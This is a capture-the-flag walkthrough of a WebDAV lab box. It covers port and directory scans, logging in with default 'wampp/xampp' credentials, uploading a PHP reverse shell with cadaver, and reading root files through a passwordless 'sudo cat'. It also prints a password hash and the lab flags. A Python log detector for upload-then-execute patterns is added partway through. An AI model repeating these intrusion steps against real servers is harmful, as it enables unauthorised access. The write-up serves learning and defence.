Nmap
```
└─$ nmap -sC -sV -oA nmap/dav 10.10.88.48
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-22 18:51 EST
Nmap scan report for 10.10.88.48
Host is up (0.10s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
```
Only one port is open, 80, and it serves the default Apache2 page.

The next logical step is to enumerate directories.
```
└─$ gobuster dir -u 10.10.88.48 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.88.48
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 290]
/.htaccess            (Status: 403) [Size: 295]
/.htpasswd            (Status: 403) [Size: 295]
/index.html           (Status: 200) [Size: 11321]
/server-status        (Status: 403) [Size: 299]
/webdav               (Status: 401) [Size: 458]
```
We found a directory named /webdav, but it requires a username and password.

Searching the internet for WebDAV default credentials turned up this page: https://xforeveryman.blogspot.com/2012/01/helper-webdav-xampp-173-default.html

user: wampp
pass: xampp
User flag
On the server I found a file, passwd.dav, containing this credential hash:

wampp:$apr1$Wm2VTkFL$PVNRQv7kzqXQIHe14qKA91

but I was not able to crack it.

I found a blog post about exploiting WebDAV, https://vk9-sec.com/exploiting-webdav/, which covers uploading a PHP reverse shell.
```
└─$ cadaver http://10.10.188.137/webdav
Authentication required for webdav on server `10.10.188.137':
Username: wampp
Password:
dav:/webdav/> ls
Listing collection `/webdav/': succeeded.
        passwd.dav                            44  Aug 25  2019
dav:/webdav/> put php-reverse-shell.php
```
Requesting the uploaded file in the browser gives us the shell!!
```
$ whoami
www-data
$ cd /home
$ ls
merlin
wampp
$ cd merlin
$ ls
user.txt
$ cat user.txt
449b40fe93f78a938523b7e4dcd66d2a
```
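The upload-then-execute sequence above (a PUT through WebDAV followed by a request for the new file) is easy to spot in the web server's own access log. Below is an added example, not code from the original write-up: a small Python detector run over constructed Apache combined-format log lines; the /webdav/ prefix, the log lines and the client strings are assumptions.

```python
import re

# Constructed Apache combined-format log lines (not real traffic): one WebDAV
# session that PUTs a PHP file and then requests it, plus a harmless text upload.
SAMPLE_LOG = """\
10.0.0.5 - - [22/Feb/2024:18:55:01 -0500] "OPTIONS /webdav/ HTTP/1.1" 401 458 "-" "cadaver/0.23.3"
10.0.0.5 - wampp [22/Feb/2024:18:55:02 -0500] "PROPFIND /webdav/ HTTP/1.1" 207 812 "-" "cadaver/0.23.3"
10.0.0.5 - wampp [22/Feb/2024:18:55:10 -0500] "PUT /webdav/php-reverse-shell.php HTTP/1.1" 201 0 "-" "cadaver/0.23.3"
10.0.0.5 - wampp [22/Feb/2024:18:55:30 -0500] "GET /webdav/php-reverse-shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.0.0.9 - wampp [22/Feb/2024:19:01:00 -0500] "PUT /webdav/notes.txt HTTP/1.1" 201 0 "-" "cadaver/0.23.3"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "[^"]*"'
)
# Extensions the web server would hand to a script interpreter.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|jsp|aspx?|cgi|pl|sh)$", re.IGNORECASE)
# WebDAV methods that create content; for MOVE/COPY the logged path is the source.
DAV_WRITE = {"PUT", "MOVE", "COPY"}


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_webdav_script_uploads(log_text, dav_prefix="/webdav/"):
    """Return one alert per script file written under dav_prefix via WebDAV; each
    alert notes whether that path was later fetched with GET/POST and answered 2xx."""
    uploads = {}  # path -> alert dict, in first-seen order
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue  # not a combined-format line
        status, path = int(rec["status"]), rec["path"]
        ok = 200 <= status < 300
        if ok and rec["method"] in DAV_WRITE and path.startswith(dav_prefix) and SCRIPT_EXT.search(path):
            uploads[path] = {"path": path, "ip": rec["ip"], "user": rec["user"],
                             "uploaded_at": rec["ts"], "executed": False}
        elif ok and rec["method"] in ("GET", "POST") and path in uploads:
            uploads[path]["executed"] = True  # upload-then-execute confirmed
    return list(uploads.values())


if __name__ == "__main__":
    for alert in find_webdav_script_uploads(SAMPLE_LOG):
        print(alert)
```

The durable server-side fix is to keep the WebDAV location from executing what it stores (no PHP handler under /webdav/) and to retire the default wampp credentials.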
Root flag
We can run /bin/cat via sudo.
```
www-data@ubuntu:/home/merlin$ sudo -l
sudo -l
Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ubuntu:
    (ALL) NOPASSWD: /bin/cat
```
Here is the /etc/shadow file; I tried john to crack the hash, but it was of no use. Then I remembered… we have cat as root.

Simply reading the root flag file will work!
```
www-data@ubuntu:/$ sudo cat /root/root.txt
sudo cat /root/root.txt
101101ddc16b0cdf65ba0b8a7af7afa5
```